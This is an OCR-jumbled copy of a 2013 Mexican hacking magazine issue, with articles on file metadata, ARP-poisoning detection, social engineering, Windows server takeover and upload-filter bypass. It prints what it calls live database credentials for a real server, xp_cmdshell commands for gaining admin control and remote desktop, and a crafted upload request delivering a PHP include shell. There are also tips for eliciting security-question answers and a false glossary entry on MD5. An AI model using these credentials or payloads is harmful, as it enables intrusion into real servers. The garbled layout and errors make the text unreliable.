Вы находитесь на странице: 1из 48

AÑO 0

ISSUE# 02
Editorial
Una vez mas estamos de el articulo asi es publicado, creemos en
vuelta con el segundo la libertad de expresión y es por eso
numero de la revista, que cada autor es responsable de lo que
la respuesta por parte escribe. A fin de cuentas es una revista
de ustedes los lectores de Hacking, no un diccionario Larousse.
fue increíble, el primer Yo por ejemplo tengo un teclado
tiraje se termino en americano donde no tiene acentos, y pues
su totalidad, hemos mis artículos saldrán obviamente sin
estado visitando una gran cantidad acentos a menos que el autocorrector
de Universidades en la republica agregue algunos por ahí.
Mexicana para promocionar la revista,
llevándoles charlas gratuitas con el Sigan al pendiente del twitter, del
staff de HackingMexico, y también Facebook, de la pagina, ya que ahí
organizando congresos y talleres de se van a enterar de donde estaremos
aprendizaje extremos, ya contamos con próximamente, para firmar revistas y
un staff mas amplio de conferencistas llevar talleres, gracias a toda la gente
reconocidos a nivel nacional e que coolaboro con artículos ya que
internacional con los cuales estaremos gracias a ellos se forma la revista, no
llevando los congresos a muchas olviden crear su blog gratuito en el
Universidades del país. portal, para poder compartir sus códigos
e investigaciones con todo el publico.
Una acalaracion que me gustaría hacer,
recibimos algunos comentarios en la Tambien apartir de este numero incluimos
edición anterior sobre las faltas de una sección donde podras ofrecer tus
ortografía que hay en la revista, esto servicios como consultor, diseñador,
se debe a que se decidio conservar la programador, etc sin costo alguno,
originalidad y escencia de cada autor, puedes enviar tu anuncio de 20 palabras
nosotros no editamos ni censuramos mas tu nombre e información de contacto
ningún contenido, tal y como nos envían al correo info@hackingmexico.mx

M.C Raul Robles A. CEO

Agradecimientos por su colaboración en este numero


• M4ku4z • Xianur0 • Telmehub
• Redpoint • Molder Sombrero De Paja • Universidad Tecnologica
• Zolidk • Axxus De San Juan Del Rio
• Annika • Mini Helios • Universidad Tecnologica
• C0dersoul • Innovattia De Tecamachalco
• 4Rc4n4 • Defcon Tijuana
• Torgnu • Universidad Francisco I • Escuela Superior De
• Torrescrack Madero Computo
• Gamaliel • Instituto Tecnologico De • Universidad Anahuac
• Chechesa Tehuacan • Instituto Tecnologico De
• Gusanin Loco • Casa Vecina Tuxtepec
• Corrupted Byte • Reunion Ubuntista • Campus Party
• Death Angel • Instituto De Estudios
• Zosemu Superiores De Oaxaca

HackingMexico, Año 1, No. 2, enero – marzo 2013, es una publicación bimestral editada por Editorial Althair, www.indautor.sep.gob.mx, infoinda@sep.gob.mx. Editor responsable: Raul
Robles Aviles. ISSN: en tramite, otorgado por el Instituto Nacional del Derecho de Autor, Licitud de Título y contenido pendiente otorgado por la Comisión Calificadora de Publicaciones
y Revistas Ilustradas de la Secretaría de Gobernación. Permiso SEPOMEX No. 010203. Impresa por Alex Impresiones S. A. de C. V. Jose Revueltas 209 Del Benito Juarez, CP 03520 este
número se terminó de imprimir el 30 de Enero de 2013 con un tiraje de 7,000 ejemplares. Las opiniones expresadas por los autores no necesariamente reflejan la postura del editor de la
publicación. Queda estrictamente prohibida la reproducción total o parcial de los contenidos e imágenes de la publicación sin previa autorización del Instituto Nacional del Derecho de Autor.

No nos hacemos responsables por el mal uso de la informacion aqui expuesta, todo el material es con fines educativos y de investigacion, hackingmexico no incita a ningun tipo de vandalismo
virtual, cyberbullying, ni cyberamenzas. La informacion es para conocimiento de todos, para poder aprender como defenderse desde un punto de vista ofensivo.
Hackingmexico esta en contra de grupos de choque y activismo como “Anonymous”, nosotros somos un grupo de profesionales expertos en seguridad informatica que no apoyan este tipo
de actividades delictivas.
hax0rpedia
Hax0rpedia

Hambreado Pwner
Profesor x Aquel que pwnea

N00b Hash
Novato Funcion que convierte una cadena de
longitud variable a una cadena de
Lam0 longitud fija
Persona que quiere aparentar algo que
no es Md5
Un tipo de encriptacion de 32 bits
Lammer
Variacion de lam0 Bitcoins
Moneda descentralizada usada en la
Wargame deepweb
Pruebas de hacking en un ambiente
controlado Deepweb
Sitios underground que solo pueden
Pwn ser accesados via tor
Variacion del termino en ingles "own"
que significa apropiarse o ser dueño Tor
Red de anonimato

www.hackingmexico.mx 3
contenido

CONTENTS PAGE
Algo más allá
de lo visible 06
Hackeando
[Detección /protección] [de/ Correos
contra] ataques ARP-Poisoning mito o
(ARP-Spoofing) 08 realidad 34
Ingeniería social /
la mayor parte 12
Identity
Penetración de and Access
servidores windows 16 Management
Ayudando a la
organización 36
Bypassing
de Uploaders 20
CISCO/
JUNIPER 38
WarDriving 24

Nxt Controler
Un troyano
CRACKEANDO Para divertirse 42
ACUNETIX
V8–2012 28

4 www.hackingmexico.mx
P U B L Í C A T E C O N N O S O T R O S

informes 55 10 68 88 09

i n f o @ h a c k i n g m e x i c o . m x
algo más alla de lo visible

Algo m s á

de lo allá

visible POr
Froylan Sedeño
Documentos fotos y otros archivos contienen información oculta
sobre su origen información como: quien es el autor fecha de
@zolidk creación y modificación programas usados para su creación en
la fotografías tomadas por algunos móviles incluso contienen
coordenadas a esto se le llama metadatos pero…

¿QUE SON LOS Los metadatos contenidos en un la información de los metadatos en


METADATOS? archivo mp3 la etiqueta ID3 conten- dichos archivos.
No existe definición exacta de lo que dría: nombre de la canción, autor, Los metadatos pueden resultar
son los metadatos se puede decir que género para las imágenes el archivo riesgosos para nuestra privacidad
son datos de otros datos, como sabe- EXIF sería el contendría los metada- como vemos en el archivo anterior
mos un archivo es un bloque de in- tos de fotografías, como el archivo muestra el autor con que programa
formación de un tamaño determinado thumbnails que es la imagen en mi- fue creado fecha de edición así como
gran parte del archivo está ocupado niatura de la fotografía original. ultima ves que fue modificado ruta de
por los datos, pero se reserva un espa- La mayoría de los editores de ar- guardado y demás.
cio para los metadatos. chivos pueden mostrar y manipular Existen varios casos importan-
tes donde los metadatos han servido
para la localización de delincuentes
ya que en las imágenes subidas a las
redes sociales contenían el geo posi-
cionamiento GPS del lugar donde fue
tomada la fotografía.
Fotografía en la que se muestran
varios paquetes de droga, fue tomada
Figura 1

Archivo de PowerPoint donde se muestran metadatos

6 www.hackingmexico.mx
algo más alla de lo visible
Archivo mp3 donde se muestran sus metadatos

con un iPhone en la cual se puede ver la posición GPS me-


diante los metadatos EXIF. Existen varios casos curiosos en
la red de varias personas que se ha visto expuesta su privaci-
dad por los metadatos. (Figura 1)
Algunos programas para analizarlos metadatos son
FOCA, EXIF, IPTC, XMP y muchos más. Así como creepy
que nos permite localizar imágenes de usuarios de twitter
para examinar los metadatos y obtener la localización donde
fue tomada dicha imagen. (Figura 2,3,4)

Figura 2
¿Te robaron tu cámara fotográfica?
Existe una página en la red que ofrece un servicio que permite lo-
calizar tu cámara o por lo menos tratar, esto lo hace analizando los
metadatos de las fotográficas se sube una imagen que haya sido
tomada por tu cámara sin modificar y se analiza el archivo EXIF
el cual contiene el número de serie y otros datos únicos de la cáma-
ra, busca en su base de datos y tratara de encontrar si existe alguna
otra imagen en la red con los mismos datos si tu cámara fue robada
fue usada y subieron imágenes a la red seguramente aparecerá en
la plataforma aquí el link de la página por si quieres probar http://
www.stolencamerafinder.com/

Existen varios aplicaciones para eliminar los


Figura 3

metadatos como:
• OOMetaExtractor (Limpiar
documentos OpenOffice o LibreOffice (.odt)).
• JPEG y PNG Stripper (Limpiar
metadatos de imágenes de formato JPEG
y PNG).
• MetaShield Protector y Metadata
Extractor (Limpiar documentos ofimáticos:
MS Office de la versión 97 a la 2007 y
OpenOffice).

Los metadatos nos pueden ser útil para hacer


un ataque de malware dirigido ya que cono-
ciendo información como autor empresa sis-
Figura 4

tema operativo y software con que fue crea-


do podríamos acertar más en nuestro ataque.

www.hackingmexico.mx 7
detección / protección

[Detección/p
POr
[de/co
ataq
Jesús Gómez (ZoSemU?)
zosemu@gmail.com
En este articulo me
permitiré explayarme con la
teoría porque creo que es
necesaria para comprender
a fondo que es lo que pasa
en este tipo de ataques, la
principal razón de hacerlo

ARP-Poi
así y no de otra manera es
que he visto que muchos que
dicen ser huaxors élite,
no tienen idea de cómo
funciona realmente esto y
luego dicen cosas que no
son ciertas. ( A R P - S p

P ara este ejemplo usaré un equipo con GNU/


Linux para realizar el ataque y aunque sería más
divertido usar la distro Bactrack como víctima,
no lo haré porque para fines prácticos la gente
tiene normalmente instalado Windows, así que la víctima
será un Ventanucos 7 Ultimate x64. Manos a la obra, pero
primero…, sí, no crean que lo había olvidado la teoría XD!!!
cionar la dirección física de nuestros dispositivos (MAC)
con la IP que tenemos asignados dentro de una red. Cabe
señalar que es un protocolo de capa dos (enlace de datos),
su funcionamiento está documentado en el RFC 826 y
funciona de la siguiente manera:
Existe una tabla de relación IP-MAC en nuestro equi-
po, cuando tenemos que enviar un paquete a determinada
Address Resolution Protocol (Protocolo de Resolu- IP, antes se debe averiguar cual es la dirección MAC a la
ción de Direcciones), es el protocolo encargado de rela- que corresponde dicha IP --¿porqué?..., porque en caso
Figura 1

8 www.hackingmexico.mx
protección]

detección / protección
ontra]
ques
isoning
o o f i n g )
contrario correríamos el riesgo de que nuestra informa- 2. Datos del paquete Ethernet
ción terminará en casa del vecino XD!!!-- en caso de no • Espacio de dirección de hardware --2 bytes (00 01)
encontrar dicha MAC en nuestra preciosa tabla se deberá • Espacio de dirección de protocolo --2 bytes (08 00)
realizar una consulta para averiguar cual es la dirección • Largo en bytes de cada dirección de hardware -- 1 byte (06)
MAC correspondiente a dicha IP, esto se conoce como • Largo en bytes de cada dirección de protocolo -- 1 byte (04)
ARP REQUEST, debido a la limitante de la capa en la • Opcode (REQUEST/REPLY) -- 2 bytes (00 01)
que opera, este tipo de consultas en realidad se realizan • Dirección de hardware del emisor del paquete -- 6 bytes
a la dirección del Broadcast (FF:FF:FF:FF:FF:FF) para (xx xx xx 71 cc e1)
cada IP a consultar, pero normalmente comienzan con la • Dirección del protocolo del emisor del paquete -- 4 bytes
IP de la que se desea averiguar la MAC, esto con el fin de (c0 a8 01 fe)
reducir la saturación de trafico; por otra parte el equipo al • Dirección del hardware del destinatario (*si se sabe) -- 6
que le estamos enviando el REQUEST recibe el paquete bytes (ff ff ff ff ff ff)
y debe actuar en consecuencia, lo que hace enviándonos • Dirección de protocolo del destinatario -- 4 bytes (c0 a8 01 02)
un paquete del tipo ARP REPLY. Para que ilustrar lo an-
terior, voy a mostrar a detalle con una captura de Wires- Los bytes que he señalado en gris corresponden a una can-
hark. (Figura 1) tidad variable de bytes. Por lo demás, la estructura será ne-
Es importante que podamos interpretar lo que significa cesariamente la misma para un ARP REPLY. Y como resulta
la información que tenemos para poder encontrar una forma evidente los bytes 21-22 son los que determinan de que tipo
de hacer que se comporte de otro modo, viendo al desnudo se trata 00 01 para un REQUEST y 00 02 para un REPLY.
nuestro ARP REQUEST podemos darnos una idea de como Ahora veamos que hace nuestro equipo para responder a
funciona entonces el ARP Poisoning. esa solicitud: (Figura 2)
En la estructura observamos que el paquete observamos Pongamos claridad en esto, como ya vimos el protocolo
que esta compuesto por: hace una consulta a su tabla local, en caso de tener la respuesta
resuelve y el paquete se envía, en caso de no existir se pregunta,
1. Capa de transmisión Ethernet si nadie responde se cancela el envío, si alguien responde se
• La dirección física de destino en este caso el broadcast --6 guarda la dirección en la tabla y se le manda el paquete.
bytes(ff ff ff ff ff ff) Ahora partiendo del hecho de que existen dos tipos de
• La dirección física de origen --6 bytes (xx xx xx 71 cc e1) entradas en la tabla local –dinámicas y estáticas--, surgen
• El tipo de protocolo --2 bytes (08 06) varias preguntas y posibilidades para el ataque, ¿qué pasaría

www.hackingmexico.mx 9
detección / protección

Figura 2

si nuestra víctima tuviera una entrada estática al router?, fin asignarle una IP valida y luego hacer el registro en todos y
del juego --porque aunque nosotros enviemos 1,000,000 de cada uno de los equipos que necesiten comunicarse con este
ARP REPLYs diciendo lo contrario, nuestra víctima los ig- nuevo equipo, bla bla bla.
norara por completo, porque ya no genera ARP REQUESTs Por lo tanto nuestra tarea como atacantes es hacerle pen-
(al menos no para esa IP) ohhhhhh!!. Entonces ya tenemos sar al router que nosotros somos nuestra víctima y a nuestra
la primer línea de defensa una entrada estática en nuestra víctima que nosotros somos el router, cómo lo conseguimos:
tabla ARP lo que conseguimos haciendo uso del comando:

arp –s IP_del_Router MAC_del_Router

Ok, ya sabemos cómo defendernos pero, ¿y si no tuviéra-


mos la dirección correcta del router?, aquí hay dos posi- Al principio debemos enviar un ARP REQUEST tanto a
bilidades si estuviéramos bajo ataque al momento de hacer nuestra víctima como al router a fin de obtener sus direccio-
la consulta podríamos pensar erradamente que la dirección nes MAC reales, una vez obtenida esa información debemos
de nuestro router es 00:11:22:33:44:55 (dirección MAC de generar paquetes del tipo ARP REPLY malformados (spoof)
nuestro atacante) y al momento de agregar la entrada estáti- y mandarlos a ambos, esto es lo que hace la aplicación
ca, facilitaríamos por completo el ataque, es más nos estaría- arpspoof de la suite de herramientas dsniff.
mos atacando nosotros mismos, porque si nuestro atacante Cómo es entonces que quedamos en medio, bueno eso
se desconecta nos dejará con una hermosa Denegación de tiene que ver con el tiempo de vida de la información en
Servios (DoS) al no existir a donde enviar los paquetes. De las tablas, como lo había mencionado antes, para que la red
hecho esa es una forma muy sencilla y práctica de dejar a mantenga coherencia, se debe saber a quien enviar un pa-
alguien sin internet y sin que se dé cuenta mujajajajajajaja!!! quete, sin embargo sería imposible para un usuario normal,
De lo que hemos visto hasta ahora, podemos inferir que recordar direcciones MAC, IPs asignadas, etc, etc. En con-
para que exista un ARP Spoof como tal, debe existir un ARP secuencia las tablas deben renovarse y por ello es que po-
Poisoning, en caso contrario no existe porque si creamos una demos engañarlas, ahora la cosa es que no sabemos en que
entrada estática en las tablas ARP, ya no se generan ARP momento nuestra víctima o nuestro router van a solicitar esa
REQUESTs y por otra parte si spoofeamos nuestra IP, MAC información así que nuestra querida herramienta debe enviar
o ambas, a pesar de eso, se generan ARP REPLYs perfec- cientos o miles de paquetes a fin de ganar la carrera contra
tamente validos aunque con datos falsos. Entonces, ¿dón- las respuestas reales y es por esto niños que solo deben hacer
de viene el spoofeo a nivel ARP?, y, ¿porqué se necesita el el ataque de arpspoof en un sentido y no en ambos como
envenenamiento (Poisoning)?, ya vimos en la idea general muchos creen.
del protocolo que todo depende de unas tablas y esas tablas Porque como buenos hackers ya habrán inducido segura-
tiene n dos tipos de entradas, normalmente las entradas son mente que si no existe la velocidad adecuada para enviar esta
dinámicas y por lo tanto tienen que tener un tiempo de vida información, es decir si generamos más respuestas que pregun-
--esto es porque de lo contrario tendría que haber alguien tas, sí, también se producirá una denegación de servicios.
encargado todo el tiempo de decidir que IP asigno a los nue- Luego de toda esta aburrida teoría les contaré que hay
vos equipos que se conecten a la red, conseguir su MAC, una herramienta que les permite simplificar todo este trabajo

10 www.hackingmexico.mx
y como no soy élite la programe en

detección / protección
VB 6, seguro que muchos élites la pu-
dieron haber programado en C o Del-
phi, pero…, no se les ocurrió antes y
en esto tengo merito jeje.
Todo surgió por un reto puesto que
si existía una herramienta que lo detec-
taba, pero siempre y cuando no te estu-
vieran atacando al momento de ejecu-
tarla, es decir que si alguien te ganaba la
carrera de lanzar el ataque antes de que
tu equipo cargará, estabas en las mis-
mas, bien como mencioné antes para

Figura 3
que el ataque funcione dependemos de
las tablas, como es bien sabido por to-
dos el sistema de los Ventanucos es muy
dado a pasarse por el forro todos los es-
tándares, así que en cuestión de ARP
no iba a ser la excepción y las tablas se
renuevan a un ritmo escandaloso mien-
tras estamos bajo un ataque, esto ocurre
porque al encontrarse una nueva entra-
da actualiza las demás, entonces si nos
están atacando el tiempo de vida de esas
tablas es menor, lo que juega un papel
importante para nuestro atacante, sin
embargo es aquí en donde vino la luz…
Si estamos bajo un ataque MITM
(Man In The Middle) como lo he expli-
cado, nuestro atacante deberá además

Figura 4
de engañarnos suplantando al router,
resolver todas nuestras conexiones, es
decir, se convierte en el router y así en el
inter, escucha nuestro tráfico ohhhhhh,
entonces la mejor manera de joderlo es
poner a prueba su capacidad de resol-
ver nuestras peticiones erróneas, tal y
como lo haría el router, ¿qué, porqué?,
sencillo si él no puede resolver, enton-
ces deberá pedir ayuda --¿a quién?-- al
router y es precisamente durante este
tiempo que tendrá que bajar la guardia y
mostrar su verdadera cara, es decir con-
seguiremos obtener dos IPs diferentes
en nuestra tabla ARP pero con la misma
MAC y así es como lo atrapamos, aún,
cuando ya estemos bajo su ataque. Para
eso solo tiramos un ping a un dominio
inexistente pero que pueda ser valido
por ejemplo “google.com.x”, “face-
book.con”, cualquiera sirve para atrapar
a nuestro pequeño mentiroso.
Bien ya solo me resta agregar un par
de capturas de pantalla en la primera se
muestra el cambio sufrido luego del ata-
que y en la segunda el resultado de nuestra
pequeña trampa jejeje. (Figura 3, 4)

www.hackingmexico.mx 11
ingeniería social

S
eguramente habrás consultado a alguien, o bien, una vulnerabilidad del sistema para hackear el servicio y ob-
alguien te ha consultado para conseguir una clave tener la clave (por ejemplo, la famosa creencia de hackear
de un correo, una cuenta de Facebook, de Mes- Hotmail). Para empezar, las claves van encriptadas en los
senger, y un largo etcétera. Lo más raro de todo, principales servicios y sólo pueden cambiarse, no pueden
es que casi siempre había que obtener una clave de alguien verse o saberse partiendo del hash.
que ni siquiera conoce la persona que se supone va a sacar En Hotmail, nos encontrábamos con la famosa “pregun-
la clave, y se asume que esa persona va a aprovecharse de ta secreta”, posteriormente agregaron preguntas más extra-

Ing
soc
ñas, como el código postal donde vives (a veces ni nosotros de los involucrados: los usuarios, los directivos y, sobre
lo sabemos), por lo que no podía ignorarse que la cuenta todo, de todos los trabajadores de la compañía. Casi siem-
pertenece a una persona de quien debe tenerse información. pre saben algo que es muy delicado respecto de alguien
Actualmente, la mayoría de las empresas, sin impor- o de la organización donde trabajan, si las personas están
tar su tamaño, aún no se toman muy en serio el asunto de felices no hay problema, pero si tienen un descontento y
que la seguridad informática es también responsabilidad son personas que no son muy respetuosas de la informa-

12 www.hackingmexico.mx
ingeniería social
ción, es posible que quieran sacar provecho del conoci- información privilegiada, es posible hacer dinero de esa forma,
miento que poseen. pero más allá de eso, nos referimos al valor de la información.
Es aquí donde hay alguien que sabe algo que nosotros quizá Como bien pudo ser información por adelantado, pudo
no, y es posible que nos interese saberlo. ¿Se imaginan conocer haber sido lo contrario, nos dicen que algo salió muy mal
por adelantado un gran hallazgo en una compañía, lo suficien- para que vendamos las acciones y dejemos de ganar dinero
temente importante como para saber que sus acciones subirán (o lo perdamos); así que esto puede ser un arma de doble
y que si compras ahora ganarías mucho dinero? Sin duda es filo, dependerá de la veracidad de la información.

geniería
cial parte
la mayor
POr Marco Antonio Camarena / Ingeniero en Computación, UNAM
@Chechesa / fb.me / Chechesa

Para hackear a una persona, generalmente es esa misma de las preguntas y pedir a alguien que las responda, muy proba-
persona la que debe darnos su información, ¿por qué ella mis- blemente no lo haga y se dé cuenta del truco.
ma? Porque podría ser información que nadie más conozca. Pongamos un ejemplo de ingeniería social: pasas un
Quizá el actor preferido, el nombre de la primer mascota o las chismógrafo (es una lista de preguntas que suele jugarse
placas del primer auto. Son cosas que no suelen salir en una contestando, para distraerse o despejarse, o simplemente
conversación y que si nos hacemos a la tarea de hacer una lista divertirte leyendo las respuestas de otros) con esas pre-

www.hackingmexico.mx 13
ingeniería social

guntas y adornas con la frase “Contesta las siguientes sación es de lo más normal del mundo, y mientras más
preguntas después de leer las respuestas de tu amigo, para temas hables, generalmente es más entretenida una con-
que te rías de las respuestas y tengas una sonrisa todo el versación. Sin duda obtendrás datos sensibles, que po-
día”, pasas el chismógrafo y contestan las preguntas que drían ser contraseñas o respuestas secretas potenciales.
necesitabas… Listo. ¿Cuál es tu comida favorita? Solía encontrar que muchos
Otro ejemplo en el que seas un habilidoso conversa- respondían “mole” o “chile”… Listo.
dor (con muy buena memoria, por cierto) y comiences a El espionaje industrial generalmente es llevado a
cambiar de temas rápidamente ¿te imaginas? Una conver- cabo por personas que actúan como ¡personas! No detrás

de un ordenador, sino a un lado de la persona con acceso ofrecerle a alguien “guardar una copia extra de la con-
a toda la información sensible de la organización. Los sis- traseña, por seguridad” y garantizar que está en buenas
temas computacionales rara vez fallan, los datos pueden manos… Listo.
ser encriptados y sólo la persona que tenga la clave po- Para conocer personas también funciona. Las chicas es-
dría ver esos datos, de modo que nadie más pueda saber tán más familiarizadas que los chicos con la ingeniería so-
qué contiene, y tratar de adivinar una (supongamos) muy cial; por ejemplo, si estás hablando con una chica, ella podrá
robusta contraseña no sería viable o recomendable, pero leer tu lenguaje corporal fácilmente. Las palabras podrían

14 www.hackingmexico.mx
ingeniería social
ser importantes, pero lo que dice tu cuerpo lo es más. Si prueba para su intelecto/área de conocimientos, puedes ha-
muestras ansiedad, tiemblas, tartamudeas o ríes nerviosa- cer la pregunta un poco más difícil.
mente, ellas lo verán de inmediato. En cambio, los chicos se Si eres chico y quieres acercarte a una chica, en lo que
fijan más en lo que dicen sus palabras, y a menudo no reci- menos debes pensar en lo que podría salir mal, sé diná-
birán el mensaje completo si no son buenos observadores (o mico y no te portes hiperactivo (eso asusta la mayoría de
si están nerviosos). las veces). Como depende más de cómo dices las cosas, si
Si eres chica y quieres acercarte a un chico, una bue- tu cuerpo habla adecuadamente, la conversación será más
na forma es preguntarle algo, si además quieres hacerle una fluida y divertida.

Un tip de convencimiento: el cerebro analiza primero Recuerda que la ingeniería social puede ser usada para
las opciones disponibles. Preguntar algo como “¿quieres el mal, pero también puede salvar vidas y evitar otras trage-
tomar un café?” tiene “Sí” y “No” como opciones, pero dias al ofrecerle confianza a quien te otorga la información
una pregunta como “¿cuál es tu refresco favorito?” o “¿te y respetar esa confianza, quizá aportando de forma benéfi-
gusta más el café o el refresco?” no tiene un no por res- ca, quizá simplemente guardando el secreto. Un gran poder
puesta, y estás provocando que a la otra persona se le conlleva una gran responsabilidad, y hay que saber respetar
antoje algo de beber… Listo. la privacidad de los demás y ser sincero.

www.hackingmexico.mx 15
penetración de servidores windows

Penetración

de
servidores
16
windows
www.hackingmexico.mx
penetración de servidores windows
H
ola soy Omar Ibañez (CorruptedByte), en esta ocacion mostrare una ma-
nera de penetrar servidores windows o mas bien como escalar privilegios
mediante SQL Server 2008. Muchas veces nos topamos con vulnerabili-
dades como “arbitrary file download”, “transversal directory”, “local file
inclusion”, “oracle padding attack” u otras y esto solo nos da acceso a codigo fuente o
archivos de configuración donde podemos encontrar el usuario y contraseña de SQL
Server (web.config) pero con esto muchas veces solo tenemos acceso a la base de datos
donde encontramos usuarios, contraseñas o muchas veces solo informacion inutil, pero
que tal si pudieramos tomar contro total del servidor con tan solo las credenciales de
SQL Server, esto es lo que mostrare en el transcurso de este articulo.

STORED PROCEDURES (PROCEDIMIENTOS desactivado por defecto debido a su alto riesgo, pero una
ALMACENADOS) vez que hayamos conseguido las credenciales de SQL Ser-
ver podemos activarlo, esta vez no me enfocare en sacar las
Como lo mencione anteriormente nos enfocaremos en la credenciales ya que como comente esto se puede obtener
penetracion de servidores windows mediante SQL Server y de el archivo web.config si es un servidor web programado
como sabemos Microsoft usa Transact-SQL (T-SQL) en su con .NET que es el archivo donde viene la configuracion y
motor de bases de datos, T-SQL como muchos otros motores la parte donde se encuentran las credenciales de SQL es el
de bases de datos tiene stored procedures que son programas ConnectionString y luce asi (esta es la parte de la conexión,
almacenados fisicamente en las bases de datos del motor, en el archivo es mas grande):
el caso de SQL Server de Microsoft las bases de datos del
motor son: master, model, msdb y tempdb.
<configuration>
XP_CMDSHELL <appSettings>
<add key=”ClearSaleActive” value=”true”/>
Uno de los stored procedures que tiene SQL Server es xp_ <addkey=”ConnectionString”value=”serv
cmdshell, xp_cmdshell nos proporciona una shell de coman- er=200.150.158.122; Database=lojavirus; User Id=virus;
dos directamente en el sistema con privilegios normalmente Password=3jig%o9!; Connection Timeout=20000”/>
administrativos asi que ya se podran imaginar que tanto po- </appSettings>
demos hacer con este stored procedure. </configuration>

REESTRICCION DE SQL SERVER EN El anterior es un servidor windows real y al dia de hoy el


VERSIONES RECIENTES servidor funciona correctamente con esas credenciales, esto
lo obtube con “Oracle Padding Attack” aunque pueden usar
Despues de SQL Server 2005 este stored procedure biene cualquier otro metodo de penetracion incluso bruteforcing.

www.hackingmexico.mx 17
penetración de servidores windows

HABILITANDO XP_ Ejecutando el comando nos devolve-


CMDSHELL ra el output como si fuera una tabla
y bueno una vez que comprovemos
Regresando al tema del xp_cmdshell, que podemos hacer la ejecucion de
como les comente desde SQL Server comandos en el servidor remoto con
2005 biene desactivado, pero se acti- SQL Server solo tenemos que echar a
va ejecutando las siguientes lineas en volar la imaginacion, si no tienes ex-
un query normal en cualquier base de periencia en explotacion de servido-
datos del sistema: res windows y sus comandos es mejor
que aprendas a usar bien el sistema
Linea para habilitar las opciones operativo pero tambien puedes utili-
avanzadas zar una herramienta llamada MSS Ex-
EXEC sp_configure ‘show advan- ploiter de R00TW0RM TEAM (foro
ced options’, 1 de 1377day.com) la cual nos permite
GO hacer lo siguiente:
Linea para actualizar la configu-
racion -Iniciar shell
RECONFIGURE -Crear usuario con permisos
GO administrativos
Linea para habilitar el stored pro- -Habilitar escritorio remoto Esta aplicación es demaciado util ya
cedure xp_cmdshell -Deshabilitar escritorio remoto que nos brinda una shell en el equipo
EXEC sp_configure ‘xp_cmdshell’, 1 -Conectar al escritorio remoto sin necesidad de hacer la ejecucion de
GO -SQL Manager toda la linea en el SQL Server (EXEC
Linea para actualizar la configu- -Matar procesos master.dbo.xp_cmdshell ‘comando’)
racion -Borrar todos los sitios web en el ademas nos agrega un usuario con
RECONFIGURE GO servidor permisos de adminsitrador y nos ha-
-Iniciar, detener y reiniciar bilita el escritorio remoto, lo mejos es
Con las anteriores lineas abremos ac- servidor web (IIS) que es desde linux y no necesitas ah-
tivado el stored procedure de manera -Apagar equipo cer la instalacion de SQL Server.
completa, obviamente para esto se tiene
que acceder a ala base de datos con el
usuario “sa” (usuario default admin-
sitrativo de SQL Server) o algun otro
usuario adminsitrativo de SQL.

TOMANDO EL CONTROL
TOTAL DEL SERVIDOR CON
XP_CMDSHELL

Una vez que tenemos activado el sto-


red procedure tenemos el control total
del servidor ya que podemos ejecutar
cualquier comando y se hace de la si-
guiente manera:

EXEC master.dbo.xp_cmdshell
‘comando a ejecutat’

Ejemplo:
EXEC master.dbo.xp_cmdshell
‘DIR C:\’ (Figura 1)

18 www.hackingmexico.mx
penetración de servidores windows
MSS EXPLOITER TOOL Con esto podemos acceder a una Con esto basicamente el servidor es
shell u a otras opciones, las 2 op- nuestro y podremos instalar un back-
Para instalar MSS Exploiter pueden ciones que mas nos facilitaran el door para tener una conexión persis-
bajarlo de http://corruptedbyte.org. trabajo es la de agregar un usuario tente o podemos hacer cualquier otra
mx/blog/mssexploiter ademas necesi- con permisos administrativos y la de cosa que se nos ocurra.
tan instalar unas librerias (esta escrito habilitar el escritorio remoto, para
en python y solo corre en linux). esto solo ejecutamos la 2da opcion Tomen en cuenta que muchas cosas
MSS Exploiter nos brinda 2 op- e introducimos el nuevo usuario y la podrian variar e incluso negarles el
ciones, conectarse al servidor win- nueva contraseña: acceso a activar el stored procedure ya
dows con las credenciales o en el caso que depende mucho de la configura-
de no tenerlas nos brinda la opcion de cion que le dan al servidor, pero la fun-
realizar un ataque de fuerza bruta. ciona con la configuracion tipica que
le dan casi todas las empresas, ami me
ha funcionado en muchos servidores y
es por eso que escribi MSS Exploiter
ya que me ahorra trabajo ala hora de
explotar servidores windows de esta
manera. Si el sitio de descarga no fun-
ciona para cuando esten leyendo esto o
necesitan ayuda con el script o explo-
Por ultimo ya solo nos quedaria ingre- tacion de servidores window con SQL
Si nos loguamos directamente con sar a el escritorio remoto ejecutando Server pueden mandarme un correo a:
las credenciales nos tira el siguiente la 5ta opcion: CorruptedByte@programmer.net.
menu donde introduciremos IP, usua-
rio y contraseña:

Ahora podremos acceder a las opcio-


nes de MSS Exploiter como se mues-
tra a continuacion:

www.hackingmexico.mx 19
bypassing de uploaders

Bypassing de Uploaders por


Braulio Miguel Suarez Urquijo
(Red-Point)
r3d-p0int@hotmail.com

A
ntes que nada un saludo a toda la old school, en Ahi se especifica de que “tipo” es el archivo.
especial a mi buen amigo megabyte. En las siguientes lineas se dice cual es el contenido del
En este articulo les enseñare algunos archivo.Si querríamos subir un archivo .php al servidor
tecnicas (no todas) para bypassear algunos solamente tendríamos que mandar esta petición:
uploaders que usan metodos para filtrar los archivos que
son subidos. Código:
-----------------------------
1.- BYPASSEANDO UPLOADS 24464570528145\r\n
QUE USAN [‘TYPE’] Content-Disposition: form-
data; name=”archivo”;
Código: filename=”h4x0r1337.
<?php php”\r\n
$archivo = $HTTP_POST_FILES[‘archivo’]; Content-Type: image/
$tipo = $archivo[‘type’]; jpeg\r\n
if (!(strpos($tipo, “jpeg”))) { \r\n
echo’No aceptamos ese tipo de archivos’; <?php include($_
}else{ GET[‘c’]); ?>
    if (move_uploaded_file($archivo[‘tmp_name’],
$archivo[‘name’])){ Si mandaramos
       echo “Archivo subido correctamente <a href=’”.$arc esa petición al
hivo[‘name’].”’>Archivo</a>”; anterior upload
    }else{ conseguiríamos
       echo “No se puede sibir”; subir mishell.
  } php con éxito,
}  para modificar
?> las cabeceras que
manda tu navegador
El código vulnerable esta situado en: $archivo[‘type’]; Ya puedes instalar este
que type es extraído de los headers que envía el navegador complemento en tu
al subir un archivo, Por ejemplo este es el contenido de firefox:
post que envía mi firefox al subir una imagen a ese upload:
https://addons.mozilla.org/es-
Código: ES/firefox/addon/3829
-----------------------------24464570528145\r\n
Content-Disposition: form-data; name=”archivo”; Ese complemento capturara todas las
filename=”imagen.jpg”\r\n peticiones que envié tu navegador, solo
Content-Type: image/jpeg\r\n tienes que darle a repetir para editarlas o buscar un
\r\n software llamado «achilles» es muy viejo pero aun sirve..
BMV\x80\x0e

ANALIZANDO LÍNEA X LÍNEA 2.- UPLOADERS QUE VERIFICAN LA EXTENSION


Código: DEL ARCHIVO
Content-Disposition: form-data; name=”archivo”;
